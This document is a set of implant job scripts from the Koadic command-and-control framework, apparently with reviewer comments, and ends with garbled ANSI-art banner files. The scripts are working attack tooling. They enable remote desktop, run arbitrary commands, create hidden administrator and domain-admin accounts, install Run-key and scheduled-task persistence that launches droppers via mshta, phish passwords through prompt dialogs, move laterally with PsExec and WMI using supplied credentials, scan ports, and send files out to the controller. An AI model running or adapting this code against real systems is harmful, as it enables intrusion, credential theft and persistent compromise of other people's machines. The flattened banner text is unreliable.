' A read-back mismatch is surfaced as runtime error 5 (ERROR_ACCESS_DENIED).
sub EnableRDesktop
    Const HKEY_LOCAL_MACHINE = &H80000002
    Const ERROR_ACCESS_DENIED = 5
    strKeyPath = "System\CurrentControlSet\Control\Terminal Server"
    strValueName = "fDenyTsConnections"
    Set objRegistry = GetObject("winmgmts:\\.\root\default:StdRegProv")
    objRegistry.CreateKey HKEY_LOCAL_MACHINE, strKeyPath
    objRegistry.SetDWORDValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, ~MODE~
    objRegistry.GetDWORDValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, dwValue
    if dwValue <> ~MODE~ then
        err.raise ERROR_ACCESS_DENIED
    end if
end sub

EnableRDesktop
KoReportWork ""
KoExit
-------------------------------------------------------------------------------- /data/implant/manage/exec_cmd.js: --------------------------------------------------------------------------------
// Runs the FCMD command on the target. OUTPUT (a JS boolean) selects between
// capturing stdout through a scratch file in FDIRECTORY and fire-and-forget via
// Koadic.shell.run. The command is substituted into a JS string literal, so the
// server side must escape backslashes and double quotes in it.
try
{
    var readout = ~OUTPUT~;
    if (readout)
    {
        var output = Koadic.shell.exec("~FCMD~", "~FDIRECTORY~\\"+Koadic.uuid()+".txt");
    }
    else
    {
        // Nothing is captured: report() is called without a payload and the
        // second report below is skipped because output stays empty.
        var output = "";
        Koadic.shell.run("~FCMD~");
        Koadic.work.report();
    }

    if (output != "")
    {
        Koadic.work.report(output);
    }
}
catch (e)
{
    Koadic.work.error(e);
}

Koadic.exit();
-------------------------------------------------------------------------------- /data/implant/manage/exec_cmd.vbs: --------------------------------------------------------------------------------
' VBScript twin of exec_cmd.js; output is always captured via a scratch .txt file.
path = KoGetPath("~DIRECTORY~\~FILE~.txt")
output = KoExecCmd("~CMD~", path)

KoReportWork output

KoExit
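--------------------------------------------------------------------------------
' Stub only: enumerates running processes via WMI and shows them in a MsgBox.
' Nothing here terminates a process, and MsgBox pops a dialog on the target's
' desktop, so as written this is not usable as an implant job.
Dim objWMIService, objProcess, colProcess
Dim strComputer, strList

Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")

Set colProcess = objWMIService.ExecQuery("Select * from Win32_Process")

For Each objProcess in colProcess
    strList = strList & vbCr & objProcess.Name
Next

MsgBox strList
-------------------------------------------------------------------------------- /data/implant/persist/add_user.js: --------------------------------------------------------------------------------
// Creates (or with CLEANUP deletes) the USERNAME account with `net user`,
// optionally domain-wide (DOMAIN) and optionally added to Administrators /
// Domain Admins (ADMIN). Each step's command output is reported with a "Task"
// header naming the step.
// NOTE(review): the password travels on the `net user` command line, so it is
// visible to process-creation auditing (command-line logging) on the target.
// Failure detection relies on the literal "error" appearing in the tool's
// output, which is locale-dependent.
try
{

    var headers = {};

    if (~CLEANUP~)
    {
        var del_user_command = "net user ~USERNAME~ /DEL";
        var output = Koadic.shell.exec(del_user_command, "~DIRECTORY~\\"+Koadic.uuid()+".txt");
        headers["Task"] = "DeleteUser";
        Koadic.work.report(output, headers);
    }
    else
    {
        var add_user_command = "net user ~USERNAME~ ~PASSWORD~ /ADD";
        if (~DOMAIN~)
        {
            add_user_command += " /DOMAIN";
        }
        var output = Koadic.shell.exec(add_user_command, "~DIRECTORY~\\"+Koadic.uuid()+".txt");
        headers["Task"] = "CreateUser";
        Koadic.work.report(output, headers);
        // Skip the group step if account creation reported an error.
        if (output.indexOf("error") != -1)
        {
            throw "";
        }

        if (~ADMIN~)
        {
            if (~DOMAIN~)
            {
                output = Koadic.shell.exec("net group \"Domain Admins\" ~USERNAME~ /ADD /DOMAIN", "~DIRECTORY~\\"+Koadic.uuid()+".txt");
            }
            else
            {
                output = Koadic.shell.exec("net localgroup Administrators ~USERNAME~ /ADD", "~DIRECTORY~\\"+Koadic.uuid()+".txt");
            }
            headers["Task"] = "MakeAdmin";
            Koadic.work.report(output, headers);
        }
    }

    Koadic.work.report("Complete");

}
catch (e)
{
    Koadic.work.error(e);
}

Koadic.exit();
-------------------------------------------------------------------------------- /data/implant/persist/registry.js: --------------------------------------------------------------------------------
// Run-key persistence: installs (or with CLEANUP removes) a value named
// "K0adic" under <hive>\Software\Microsoft\Windows\CurrentVersion\Run that
// launches the dropper at FDROPDIR\FDROPFILE through mshta.exe, and fetches /
// deletes that dropper file. FHKEY is the numeric hive handle (0x80000001 HKCU,
// 0x80000002 HKLM). The value name and the full C:\Windows\system32\mshta.exe
// path are fixed strings and easy to signature.
try
{
    var headers = {};
    var path = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";
    var droppath = Koadic.file.getPath("~FDROPDIR~\\~FDROPFILE~");
    var key = "K0adic";

    if (~CLEANUP~)
    {
        headers["Task"] = "DeleteKey";
        var hkey = ~FHKEY~;
        var hkeyname = "";
        switch(hkey)
        {
            case 0x80000001:
                hkeyname = "HKCU";
                break;
            case 0x80000002:
                hkeyname = "HKLM";
                break;
            default:
                // Previously fell through with an empty prefix and ran
                // "reg delete \Software\..." which can only fail; refuse early
                // so the operator sees why.
                throw new Error("Unsupported registry hive: " + hkey);
        }
        var retval = Koadic.shell.exec("reg delete "+hkeyname+"\\"+path+" /v "+key+" /f", "~DIRECTORY~\\"+Koadic.uuid()+".txt");
        Koadic.work.report(retval, headers);
        headers["Task"] = "DeleteDropper";
        Koadic.file.deleteFile(droppath);
        // Reports whether the file still exists plus its path, triple-tilde separated.
        Koadic.work.report(Koadic.FS.FileExists(droppath).toString()+"~~~"+droppath, headers);
    }
    else
    {
        Koadic.registry.write(~FHKEY~, path, key, "C:\\Windows\\system32\\mshta.exe "+droppath, Koadic.registry.STRING);
        headers["Task"] = "AddKey";
        var retval = Koadic.registry.read(~FHKEY~, path, key, Koadic.registry.STRING).SValue;
        Koadic.work.report(retval, headers);

        // With X-UploadFileJob set, downloadEx POSTs to the job URL and
        // presumably writes the response body to droppath (its existence is
        // checked right after) — this is where the dropper lands on disk.
        headers["X-UploadFileJob"] = "true";
        Koadic.http.downloadEx("POST", Koadic.work.make_url(), headers, droppath);
        headers["X-UploadFileJob"] = "false";
        headers["Task"] = "AddDropper";
        Koadic.work.report(Koadic.FS.FileExists(droppath).toString()+"~~~"+droppath, headers);
    }

    Koadic.work.report("Complete");

}
catch (e)
{
    Koadic.work.error(e);
}

Koadic.exit();
-------------------------------------------------------------------------------- /data/implant/persist/schtasks.js: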
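--------------------------------------------------------------------------------
// Scheduled-task persistence: creates (or with CLEANUP removes) a task named
// "K0adic" that runs the dropper at FDROPDIR\FDROPFILE via mshta.exe, and
// fetches / deletes that dropper. ELEVATED selects an at-logon task running as
// SYSTEM, otherwise an on-idle task in the current user's context. The task
// name and the full mshta.exe path are fixed strings and easy to signature.
try
{
    var headers = {};
    var taskname = "K0adic";
    var droppath = Koadic.file.getPath("~FDROPDIR~\\~FDROPFILE~");
    if (~CLEANUP~)
    {
        var result = Koadic.shell.exec("schtasks /delete /tn "+taskname+" /f", "~DIRECTORY~\\"+Koadic.uuid()+".txt");
        headers["Task"] = "DeleteTask";
        Koadic.work.report(result, headers);
        headers["Task"] = "DeleteDropper";
        Koadic.file.deleteFile(droppath);
        Koadic.work.report(Koadic.FS.FileExists(droppath).toString()+"~~~"+droppath, headers);
    }
    else
    {
        var result = Koadic.shell.exec("schtasks /query /tn "+taskname, "~DIRECTORY~\\"+Koadic.uuid()+".txt");
        headers["Task"] = "QueryTask";
        Koadic.work.report(result, headers);
        // With NOFORCE set, an existing task (query output without "ERROR" —
        // an English-locale check) is deleted before re-creation.
        if (~NOFORCE~)
        {
            if (result.indexOf("ERROR") == -1)
            {
                result = Koadic.shell.exec("schtasks /delete /tn "+taskname+" /f", "~DIRECTORY~\\"+Koadic.uuid()+".txt");
                headers["Task"] = "NoForceTask";
                Koadic.work.report("", headers);
            }
        }
        if (~ELEVATED~)
        {
            // /ru System requires an elevated implant; /f overwrites silently.
            result = Koadic.shell.exec("schtasks /create /tn "+taskname+" /tr \"C:\\Windows\\system32\\mshta.exe "+droppath+"\" /sc onlogon /ru System /f", "~DIRECTORY~\\"+Koadic.uuid()+".txt");
        }
        else
        {
            result = Koadic.shell.exec("schtasks /create /tn "+taskname+" /tr \"C:\\Windows\\system32\\mshta.exe "+droppath+"\" /sc onidle /i 1 /f", "~DIRECTORY~\\"+Koadic.uuid()+".txt");
        }
        headers["Task"] = "AddTask";
        Koadic.work.report(result, headers);

        // X-UploadFileJob: downloadEx POSTs to the job URL and presumably writes
        // the response body to droppath; its existence is reported afterwards.
        headers["X-UploadFileJob"] = "true";
        Koadic.http.downloadEx("POST", Koadic.work.make_url(), headers, droppath);
        headers["X-UploadFileJob"] = "false";
        headers["Task"] = "AddDropper";
        Koadic.work.report(Koadic.FS.FileExists(droppath).toString()+"~~~"+droppath, headers);
    }
    Koadic.work.report("Complete");
}
catch (e)
{
    Koadic.work.error(e);
}

Koadic.exit();
-------------------------------------------------------------------------------- /data/implant/phish/password_box.js: --------------------------------------------------------------------------------
// Credential phish: shows a prompt with MESSAGE and reports whatever the user
// types. prompt() is a DOM function, so this only works where the implant has
// a window (the MSHTA host); the commented-out ScriptControl/InputBox attempt
// below is a dead experiment (see the author's note).
try {
    // cool stuff!
    // http://with-love-from-siberia.blogspot.com/2009/12/msgbox-inputbox-in-jscript.html

    // but it didn't work? :[

    /*
    var vb = {};

    vb.Function = function(func)
    {
        return function()
        {
            return vb.Function.eval.call(this, func, arguments);
        };
    };


    vb.Function.eval = function(func)
    {
        var args = Array.prototype.slice.call(arguments[1]);
        for (var i = 0; i < args.length; i++) {
            if ( typeof args[i] != 'string' ) {
                continue;
            }
            args[i] = '"' + args[i].replace(/"/g, '" + Chr(34) + "') + '"';
        }

        var vbe;
        alert("yo")
        vbe = new ActiveXObject('ScriptControl');
        vbe.Language = 'VBScript';

        return vbe.eval(func + '(' + args.join(', ') + ')');
    };
    */

    /**
     * InputBox(prompt[, title][, default][, xpos][, ypos][, helpfile, context])
     */
    //var InputBox = vb.Function('InputBox');

    // var a = InputBox("~MESSAGE~")

    // Cancel yields null, which is reported as-is.
    var a = prompt("~MESSAGE~", "");
    Koadic.work.report(a);

} catch (e) {
    Koadic.work.error(e);
}

Koadic.exit();
-------------------------------------------------------------------------------- /data/implant/phish/password_box.vbs: --------------------------------------------------------------------------------
' VBScript twin of password_box.js: native InputBox with MESSAGE. The previous
' version stored the answer in `a` and then did nothing with it, so the phished
' value never reached the server; report it and exit like the other VBS jobs.
a = inputbox("~MESSAGE~")
KoReportWork a
KoExit
-------------------------------------------------------------------------------- /data/implant/pivot/exec_psexec.js: --------------------------------------------------------------------------------
// Lateral movement with PsExec: runs psexec.exe from the RPATH share against
// \\RHOST with CMD, passing SMBDOMAIN\SMBUSER and SMBPASS on the command line
// when both user and password are set (otherwise psexec runs with the
// implant's own credentials). PsExec output is not captured; "Complete" is
// reported regardless of the result.
// NOTE(review): the password is exposed on the psexec command line to
// process-creation auditing on this host; -accepteula suppresses the EULA
// dialog (PsExec records the acceptance under HKCU, another artifact).
try
{
    var rpath = "~RPATH~"
    var UNC = "~RPATH~\\psexec.exe ";
    var domain = "~SMBDOMAIN~";
    var user = "~SMBUSER~";
    var pwd = "~SMBPASS~";
    var computer = "\\\\~RHOST~ ";

    UNC += computer;

    if (user != "" && pwd != "")
    {
        if (domain != "")
        {
            user = '"' + domain + "\\" + user + '"';
        }

        UNC += "-u " + user + " -p " + pwd + " ";
    }

    UNC += " -accepteula ~CMD~";

    // crappy hack to make sure it mounts
    // Maps the share to a free drive letter and immediately unmaps it, presumably
    // so an SMB session to the share exists before psexec.exe is run by UNC path.
    // Parsing "Drive X: is now connected" assumes English `net use` output.

    var output = Koadic.shell.exec("net use * " + rpath, "~DIRECTORY~\\"+Koadic.uuid()+".txt");

    if (output.indexOf("Drive") != -1)
    {
        var drive = output.split(" ")[1];
        Koadic.shell.run("net use " + drive + " /delete", true);
    }
    // Hidden window (0), wait for completion (true).
    Koadic.WS.Run("%comspec% /q /c " + UNC, 0, true);

    Koadic.work.report("Complete");
}
catch (e)
{
    Koadic.work.error(e);
}

Koadic.exit();
-------------------------------------------------------------------------------- /data/implant/pivot/exec_wmi.js: --------------------------------------------------------------------------------
// Lateral movement over WMI/DCOM: connects to root\cimv2 on RHOST as
// SMBDOMAIN\SMBUSER with SMBPASS and starts CMD with Win32_Process.Create;
// the Create return code (0 = started) is reported. Impersonation level 3 =
// impersonate, authentication level 6 = packet privacy (encrypted DCOM traffic).
// NOTE(review): unlike the other jobs the catch below sends e.message through
// Koadic.work.report rather than Koadic.work.error, so a connection or
// authentication failure arrives at the server looking like a normal result.
// The user string is built as "DOMAIN\USER" unconditionally; with an empty
// domain that becomes "\user" — presumably the server fills a default; confirm.
try
{
    var status = -1;

    var objSWbemLocator = new ActiveXObject("WbemScripting.SWbemLocator");


    objSWbemLocator.Security_.ImpersonationLevel = 3;
    objSWbemLocator.Security_.AuthenticationLevel = 6;
    var objSWbemServices = objSWbemLocator.ConnectServer("~RHOST~", "root\\cimv2", "~SMBDOMAIN~\\~SMBUSER~", "~SMBPASS~");

    objSWbemServices.Security_.ImpersonationLevel = 3;
    objSWbemServices.Security_.AuthenticationLevel = 6;

    var intProcessID = 0;
    var objProcess = objSWbemServices.Get("Win32_Process");
    //alert("~CMD~");
    status = objProcess.Create("~CMD~", null, null, intProcessID);

    Koadic.work.report(status);
}
catch (e)
{
    //alert(e.message);
    Koadic.work.report(e.message);
}

Koadic.exit();
-------------------------------------------------------------------------------- /data/implant/pivot/exec_wmi.vbs: --------------------------------------------------------------------------------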
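' VBScript twin of exec_wmi.js. There is no On Error handling: if ConnectServer
' or Create raises, the script stops with the host's default error handling and
' KoReportWork is never reached. The user string is built as "DOMAIN\USER"
' unconditionally, so an empty domain yields "\user".
sub ExecWMI
    set objSWbemLocator = CreateObject("WbemScripting.SWbemLocator")
    'MsgBox "o"
    set objSWbemServices = objSWbemLocator.ConnectServer("~RHOST~", "root\cimv2", "~SMBDOMAIN~\~SMBUSER~", "~SMBPASS~")

    ' 3 = impersonate, 6 = packet privacy (encrypted DCOM).
    objSWbemServices.Security_.ImpersonationLevel = 3
    objSWbemServices.Security_.AuthenticationLevel = 6

    set objProcess = objSWbemServices.Get("Win32_Process")
    errReturn = objProcess.Create("~CMD~", null, null, intProcessID)
end sub

dim errReturn
errReturn = -1

ExecWMI
KoReportWork errReturn
KoExit
-------------------------------------------------------------------------------- /data/implant/scan/tcp.js: --------------------------------------------------------------------------------
// Probes a port by issuing an HTTP GET to http://ip:port through WinHttp and
// classifying the transport-level error: a refused connection means "closed";
// anything that got far enough to fail at the protocol level (or succeeded)
// means "open". The constants are WinHttp HRESULTs as JScript exposes them in
// err.number (signed 32-bit). WaitForResponse reports a timeout through its
// return value, which is not checked, so a filtered port likely ends up "open".
function TestPortMSHTA(url)
{
    var ret = {};
    ret.status = "unknown";
    ret.errno = -1;

    var ABNORMAL_TERMINATION = -2147012866;
    var UNSUPPORTED_PORT = -2147012795;
    var CONNECTION_ERROR = -2147012867;
    var WRONG_PROTOCOL = -2147012744;
    var OPERATION_CANCELED = -2147012879;

    try
    {
        var objHTTP = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
        objHTTP.Open("GET", url, true);
        objHTTP.Send();
        objHTTP.WaitForResponse(~TIMEOUT~);

        ret.status = "open";
        ret.errno = 0;
    }
    catch(err)
    {
        ret.errno = err.number;

        if (err.number == UNSUPPORTED_PORT)
            ret.status = "unsupported";
        else if (err.number == CONNECTION_ERROR)
            ret.status = "closed";
        else if (err.number == WRONG_PROTOCOL || err.number == ABNORMAL_TERMINATION || err.number == OPERATION_CANCELED)
            ret.status = "open";
    }

    return ret;
}

// Builds the probe URL for one ip/port pair.
function TestPort(ip, port)
{
    var url = "http://" + ip + ":" + port;
    return TestPortMSHTA(url);
}


// Server-side expansions defining the `ips` and `ports` arrays.
~RHOSTSARRAY~

~RPORTSARRAY~

// One result record: status, ip, port and errno, newline-separated.
function status_string(status, ip, port, err)
{
    return status + "\n" + ip + "\n" + port + "\n" + err;
}

// Host loop. With CHECKLIVE a host is only scanned when a probe of port 1 comes
// back "closed" (connection refused, i.e. the host answered); any other outcome
// — including "open" or a probe that timed out / stayed "unknown" — is reported
// as "not up" and the host is skipped. Without CHECKLIVE every host is scanned.
try
{
    for (var idx in ips)
    {
        var ip = ips[idx];
        var test = "closed";
        var testerrno = 0;
        if (~CHECKLIVE~)
        {
            // ghetto check if the IP is up
            var testport = TestPort(ip, 1);
            test = testport.status;
            testerrno = testport.errno;
        }
        if (test == "closed")
        {
            for (var pdx in ports)
            {
                var port = ports[pdx];
                var ret = TestPort(ip, port);
                Koadic.work.report(status_string(ret.status, ip, port, ret.errno));
            }
        }
        else
        {
            Koadic.work.report(status_string("not up", ip, 1, testerrno));
        }
    }

    Koadic.work.report("done");
}
catch(e)
{
    Koadic.work.error(e);
}

Koadic.exit();
-------------------------------------------------------------------------------- /data/implant/scan/tcp.vbs: --------------------------------------------------------------------------------
' TCP port probe for the VBScript implant. Each port is probed with an HTTP GET
' and classified from the transport error, mirroring tcp.js.
' The previous version embedded JScript syntax (function ... { }, var, try/catch)
' in this VBScript file, which the host rejects at parse time, so no scan could
' ever run; the MSHTA probe below is the same logic written as VBScript, and the
' host selection uses the isobject(window) test already used by upload_file.vbs.
dim kotimeout
kotimeout = ~TIMEOUT~

' WinHttp HRESULTs as they appear in Err.Number (signed 32-bit); same values as tcp.js.
Const ABNORMAL_TERMINATION = -2147012866
Const UNSUPPORTED_PORT = -2147012795
Const CONNECTION_ERROR = -2147012867
Const WRONG_PROTOCOL = -2147012744
Const OPERATION_CANCELED = -2147012879

' WScript host: MSXML XMLHTTP, asynchronous send, sleep kotimeout, then read the
' status. -2147467259 is E_FAIL (&H80004005); 12029/12031/12005 are WinINet
' error numbers surfaced through x.status.
function TestPortWscript(url)
    on error resume next
    Set x = createobject("Microsoft.XMLHTTP")
    x.open "GET", url, true
    x.send
    'MsgBox url
    KoSleep kotimeout

    status = x.status
    if err.number = -2147467259 then
        TestPortWscript = "open"
        exit function
    end if

    if x.status < 1000 or x.status = 12031 then
        TestPortWscript = "open"
        exit function
    end if
    if status = 12029 then
        TestPortWscript = "closed"
        exit function
    end if
    if x.status = 12005 then
        TestPortWscript = "unsupported"
        exit function
    end if

    TestPortWscript = "unknown"
end function

' MSHTA host: WinHttpRequest with a bounded WaitForResponse. Classification of
' Err.Number follows tcp.js: refused = "closed", anything that reached a
' protocol-level error (or no error) = "open".
function TestPortMSHTA(url)
    on error resume next
    dim objHTTP
    Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1")
    objHTTP.Open "GET", url, True
    objHTTP.Send
    objHTTP.WaitForResponse ~TIMEOUT~

    select case err.number
        case 0
            TestPortMSHTA = "open"
        case UNSUPPORTED_PORT
            TestPortMSHTA = "unsupported"
        case CONNECTION_ERROR
            TestPortMSHTA = "closed"
        case WRONG_PROTOCOL, ABNORMAL_TERMINATION, OPERATION_CANCELED
            TestPortMSHTA = "open"
        case else
            TestPortMSHTA = "unknown"
    end select
end function

' Picks the probe for the current host. `window` only exists inside an HTA.
function TestPort(ip, port)
    dim url
    url = "http://" & ip & ":" & port
    if isobject(window) then
        TestPort = TestPortMSHTA(url)
    else
        TestPort = TestPortWscript(url)
    end if
end function


~RHOSTS~

~RPORTS~


' Host loop, as in tcp.js: a host is scanned only when the liveness probe comes
' back "closed" (connection refused). The probe port is 1 to match tcp.js (the
' earlier text used port 0). Note that errno reads the Err object after
' TestPort has returned; whether the probe error survives the procedure exit is
' host-dependent, so treat it as informational.
for each ip in ips
    ' ghetto check if the IP is up
    if TestPort(ip, 1) = "closed" then
        for each port in ports
            data = TestPort(ip, port)
            errno = hex(err.number)
            data = data & vbcrlf & ip & vbcrlf & port & vbcrlf & errno
            KoReportWork data
        next
    else
        errno = hex(err.number)
        KoReportWork "not up" & vbcrlf & ip & vbcrlf & "1" & vbcrlf & "-1"
    end if
next

KoReportWork "done"

KoExit
-------------------------------------------------------------------------------- /data/implant/util/download_file.js: --------------------------------------------------------------------------------
// Exfiltrates the RFILEF file from the target: Koadic.http.upload POSTs it to
// the C2 under the field name "data". CERTUTIL is a flag passed through to
// upload (presumably selecting a certutil-based encoding — it is also passed in
// the hashdump job; confirm).
try
{
    Koadic.http.upload("~RFILEF~", "data", ~CERTUTIL~);
}
catch (e)
{
    Koadic.work.error(e);
}

Koadic.exit();
-------------------------------------------------------------------------------- /data/implant/util/download_file.vbs: --------------------------------------------------------------------------------
Function WinHTTPPostRequest(URL, FormData, Boundary)
    Dim http 'As New MSXML2.XMLHTTP

    'Create XMLHTTP/ServerXMLHTTP/WinHttprequest object
    'You can use any of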
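'these three objects.
    Set http = CreateObject("WinHttp.WinHttprequest.5.1")
    'Set http = CreateObject("MSXML2.XMLHTTP")
    'Set http = CreateObject("MSXML2.ServerXMLHTTP")

    'Open URL As POST request
    http.Open "POST", URL, False

    'Set Content-Type header
    http.setRequestHeader "Content-Type", "multipart/form-data; boundary=" + Boundary

    'Send the form data To URL As POST binary request
    ' (a leftover "MsgBox Len(formdata)" debug popup was removed here: it
    ' stalled the job on a dialog visible to the target user)
    http.send FormData

    'Get a result of the script which has received upload
    WinHTTPPostRequest = http.responseText
End Function

' WinHTTPPostRequest above is not called in this file; the file body goes back
' through KoReportWork instead.
path = KoGetPath("~RFILE~")
data = KoReadBinaryFile(path)

' Escape backslash and NUL before transport (binary compare, whole string).
' Two further debugging MsgBox calls that bracketed this step were removed:
' each popped a dialog on the target and blocked until it was dismissed.
data = Replace(data, chr(92), "\\", 1, -1, 0)
data = Replace(data, chr(0), "\0", 1, -1, 0)

KoReportWork data
KoExit
-------------------------------------------------------------------------------- /data/implant/util/upload_file.js: --------------------------------------------------------------------------------
// Drops a file onto the target: with X-UploadFileJob set, downloadEx POSTs to
// the job URL and presumably writes the response body to DIRECTORY\FILE —
// "upload" is from the operator's point of view.
try
{
    var headers = {};
    headers["X-UploadFileJob"] = "true";
    var path = Koadic.file.getPath( "~DIRECTORY~\\~FILE~");

    Koadic.http.downloadEx("POST", Koadic.work.make_url(), headers, path);
    Koadic.work.report("Completed");
}
catch (e)
{
    Koadic.work.error(e);
}

Koadic.exit();
-------------------------------------------------------------------------------- /data/implant/util/upload_file.vbs: --------------------------------------------------------------------------------
' VBScript twin of upload_file.js. The response body is written to disk in
' chunks of pagesize bytes, yielding to the HTA message loop between chunks
' (window.setTimeout) so a large file does not freeze the host; outside an HTA
' (no window object) the chunks are copied in a plain recursive loop.
' NOTE(review): bytes are written through a text stream (OpenTextFile format 0,
' ASCII) after a Chr(AscB(...)) round trip, which goes through the ANSI code
' page — bytes >= &H80 may not survive unchanged; confirm with a binary upload.
path = KoGetPath("~DIRECTORY~\~FILE~")

dim headers(1)
headers(0) = "X-UploadFileJob"
headers(1) = "true"

set http = KoReportWorkEx("", headers)

' Default IE policy does not allow this in MSHTA sessions
'dim bStrm: Set bStrm = createobject("Adodb.Stream")

'with bStrm
'' .type = 1 '//binary
'' .open
'' .write http.responseBody
'' .savetofile path, 2 '//overwrite
'end with

' we have to solve Shlemiel the Painter problem
' so we carry the bucket with us for every pagesize
dim j, roadlen, pagesize, pagecount, fd, timeouthandle
j = 1
roadlen = LenB(http.responseBody)
pagesize = 2000
pagecount = roadlen \ pagesize

set fd = kofs.OpenTextFile(path, 2, True, 0)

' Copies page j (1-based, MidB is 1-based) and schedules itself for the next
' page, or hands over to FinishUp once all full pages are written.
sub CopyBytesWithTimeOut
    on error resume next
    'for j = 1 to pagecount
    'if roadlen <= FinishUp
    if j = pagecount + 1 then
        FinishUp
    else
        data = ""
        roadsection = MidB(http.responseBody, (j-1)*pagesize+1, pagesize)
        for i = 1 to LenB(roadsection)
            data = data & Chr( AscB( MidB( roadsection, i, 1 ) ) )
        next
        fd.write data
        j = j + 1
        if isobject(window) then
            timeouthandle = window.setTimeout(GetRef("CopyBytesWithTimeOut"), 0)', "VBScript")
        else
            CopyBytesWithTimeOut
        end if
    end if
    'next
end sub

' Writes the partial last page (roadlen mod pagesize bytes), closes the file
' and reports completion.
sub FinishUp
    on error resume next
    data = ""

    ' The full pages covered bytes 1..pagecount*pagesize, so the remainder
    ' starts one past that. The previous code started AT pagecount*pagesize
    ' (with a special case for 0), which re-wrote the last byte of the final
    ' full page and dropped the real last byte of the file whenever roadlen
    ' was larger than pagesize and not a multiple of it. For pagecount = 0
    ' this still yields 1.
    startIndex = pagecount * pagesize + 1

    ' write the remaining page
    remainder = MidB(http.responseBody, startIndex, roadlen - pagecount*pagesize)
    for i = 1 to LenB(remainder)
        data = data & Chr( AscB( MidB( remainder, i, 1 ) ) )
    next

    fd.write data
    fd.close()

    KoReportWork ""
    KoExit

end sub

CopyBytesWithTimeOut
-------------------------------------------------------------------------------- /data/pabst.txt: --------------------------------------------------------------------------------

\033[31;1m00000000000000\033[0m \033[34;1m.`.`.`.`.\033[0m
\033[31;1m00000000000000\033[0m \033[34;1m./sssyy/+h+yysss-\033[0m
\033[31;1m00000000000000\033[0m\033[34;1m`shsy.`-/+ooo+ooo+//.`-ysdo\033[0m
\033[0m\033[31;1m00000000\033[0m\033[34;1m-yyy: .++y`.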
``-+soo``+yys.\033[0m 6 | \033[0m\033[31;1m0000\033[0m\033[34;1m`hh.`:/y: `/s+:`-ds`\033[0m 7 | \033[34;1m-yh-./y. -h-.:ds.\033[0m 8 | \033[34;1mhh``/h. \033[37m_______ ___ _______\033[0m \033[34;1m-h-`.ds\033[0m 9 | \033[34;1m/d+--h: \033[37m| . | \\| .\\| _|_ _\\\033[0m \033[34;1m+s--sd-\033[0m 10 | \033[34;1m`` `sm../y \033[37m| __| . | .<[__ \\||\033[0m \033[34;1m`d-.:m+\033[0m 11 | \033[34;1m.soooooso``// \033[37m___ _ |/ |/\\_|___|___/|/\033[0m \033[34;1mo:`.soooooo+`\033[0m 12 | \033[34;1ms+ \033[37m| . | |_ _ ___ | . <_| |_| |_ ___._ _\033[0m \033[34;1md-\033[0m 13 | \033[34;1ms+ \033[37m| . | | | / ._> | | | . | . / . | ' |\033[0m \033[34;1md-\033[0m 14 | \033[34;1ms+ \033[37m|___|_`___\\___. |_\\_|_|___|___\\___|_|_|\033[0m \033[34;1md-\033[0m 15 | \033[34;1mos./++++:.:/:-.+/: +-+-+-+-+ ::.-://:-//:-+/..d.\033[0m 16 | \033[34;1m`/++++++++sh/--:s:` |\033[37mB\033[0m\033[34;1m|\033[37mE\033[0m\033[34;1m|\033[37mE\033[0m\033[34;1m|\033[37mR\033[0m\033[34;1m| \033[34;1m`/s---+h+++++++++:\033[0m 17 | \033[34;1m`-hy../+s:` +-+-+-+-+ ./s+:.-ds. \033[0m 18 | \033[34;1m.oyh-`:+o+:.` `.:oo+-`/hs+`\033[0m 19 | \033[34;1m.dhso``/:oo+/-........-:/+o+/:`.yshm` \033[0m 20 | \033[34;1mod` .++oy++s-.s-.//.:s/+y++/` od`\033[0m\033[31;1m0\033[0m 21 | \033[34;1m.d+ `-.-++:sdo:+/..-` .m+\033[0m\033[31;1m000\033[0m 22 | \033[34;1mod` om: od`\033[0m\033[31;1m0000\033[0m 23 | \033[34;1m+d` /m/m- +d.\033[0m\033[31;1m00000\033[0m 24 | \033[34;1m`hs```````` yy `d+ ````..-:do \033[0m\033[31;1m00000\033[0m 25 | \033[34;1m.osssyyyyyys/. 
-m- od` `-+syysso+/::-\033[0m\033[31;1m00000000\033[0m 26 | \033[34;1m-+yy+-`sy .m/`./shs/.\033[0m \033[31;1m00000000000000\033[0m 27 | \033[34;1m`:shm: sdhs/.\033[0m \033[31;1m00000000000000\033[0m 28 | \033[34;1m`-` .-`\033[0m \033[31;1m00000000000000\033[0m 29 | -------------------------------------------------------------------------------- /data/shamrock.txt: -------------------------------------------------------------------------------- 1 | 2 | \033[32;32m `-.\033[0m 3 | \033[33;32m -` `-/osoooss:`-``\033[0m 4 | \033[33;32m ` .`+ssso+++os++//-```.`. --`\033[0m 5 | \033[33;32m .-:+oosy+` `/sssoo+++oy`:+.\033[0m 6 | \033[33;32m `-+o+ooo++/ /yyyhysyhyoo+o.\033[0m 7 | \033[33;32m `:/sys:.` `` `yyhhhsoooyhys++-\033[0m 8 | \033[33;32m `.`+hh: `hhs:` .o+/:.`.\033[0m 9 | \033[33;32m +hhh. -y: `y++o.\033[0m 10 | \033[33;32m -hhhhs. -` -sssy-`\033[0m 11 | \033[33;32m `/oyyys+:. -syyyyo`\033[0m 12 | \033[33;32m ``+ssyhhyo+:-`` `+hhhh:\033[0m 13 | \033[33;32m ```/++os:` `` shhhy.\033[0m 14 | \033[33;32m .:/o+` :.:-` .hhhhs:\033[0m 15 | \033[33;32m `./s+ /+--os/-` `.+yhhh+.-`\033[0m 16 | \033[33;32m `.++s: +hho.-shhhhhdysyyo:.`\033[0m 17 | \033[33;32m ` `:`:yhyso+- `shhys+`./syyo+:-`.``\033[0m 18 | \033[33;32m ` .shdddho ohhhsshho. `-:o+. 
